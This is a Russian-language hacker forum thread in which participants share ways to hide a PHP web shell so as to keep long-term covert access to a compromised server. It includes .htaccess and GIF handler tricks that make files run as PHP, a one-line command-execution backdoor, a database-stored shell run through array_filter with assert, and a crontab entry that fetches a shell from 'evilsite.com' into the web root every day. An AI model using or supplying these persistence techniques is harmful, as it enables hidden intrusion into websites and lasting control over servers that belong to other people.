Собираю коллекцию способов, как спрятать шелл

1) Спрятать в .htaccess

# Override default deny rule to make .htaccess file accessible over web

Order allow,deny

Allow from all

# Make .htaccess file be interpreted as php file. This occur after apache has interpreted

# the apache directoves from the .htaccess file

AddType application/x-httpd-php .htaccess

###### SHELL ###### &1"); ?>###### LLEHS ######

domain/path/.htaccess?c=command

2) Аппенд ко всем скриптам php_value auto_append_file "/tmp/httpconf.tmp"

3) Спрятать в гиф

.htaccess

AddType application/x-httpd-php gif

4) Записать шелл в базу данных, в неприметную новость

Какие еще хорошие способы спрятать шелл, чтобы долго удержаться в системе?

echo `$_REQUEST[shell]`;

1. Для начала разберем структуру команды crontab. Таблица crontab состоит из 6 колонок, разделяемых пробелами или табуляторами. Первые пять колонок задают время выполнения (Минута, Час, День, Месяц, День недели), в них может находиться число, список чисел, разделенных запятыми, диапазон чисел, разделенных тире, или символ ‘*’.

Все остальные символы в строке интерпретируются как выполняемая команда с ее параметрами.

2. Вероятно, на сервере нет поддержки псевдотерминала, поэтому создадим временный файл /tmp/cmd со следующим содержимым:

SHELL=/bin/bash 1 0 * * * wget http://evilsite.com/shell.txt -O /home/user/www/shell.php

3. Запускаем команду crontab /tmp/cmd.

4. Радуемся, ведь теперь в директории /var/spool/cron (может меняться в зависимости от системы) будет создан файл с именем пользователя, который будет каждый день, в 00 часов 01 минуту запускать команду wget, для скачивания нашего шелла.

мини-статья из журнала ][акер декабрь 2009 года.

Вот об этом нельзя ли поподробней, плиз? Чаще всего в этом случае пхп код просто выводится на экран.

Для того что бы php код не выводился, а выполнялся, нужно использовать callback функции.

Если не трудно,можно пример,как это выглядеть должно?

В колонке `pass` - phpinfo(); в колонке `user` - assert, вот структура базы, для теста:

Т.е. логика у скрипта такая, если в _REQUEST['userlogin'] передаются данные, то скрипт обращается к базе и запрашивает из таблицы users две колонки user и pass у записи где id равен 1, и эти данные попадают в функцию array_filter которая возвращает данные отфильтрованные в соответствии с результатом функции обратного вызова, в качестве такой функции мы используем assert, которая может обработать строку как PHP код, в качестве этой строки у нас phpinfo(); что собственно и работает нам на руку.

если я правильно понял,то при данной схеме вместо какой-то определенной страницы на сайте будет загружаться вебшелл? Верно?

А можно ли к примеру сделать таким образом,чтобы при запросе опредленной страницы вебшел из базы записывался в какую-нибудь папку? И записывался бы только в случае,его отсутствия в этой папке.

Конечно можно. Пищу для размышлений и пример реализации я тебе дал.

А как вам такой вариант незаметного шелла?

Не каждый может заметить такой шелл.

И отправляем пакет, в хеадер добавляем:

Единственное, нужно чтобы флаг e был разрешен, по дефолту — разрешен.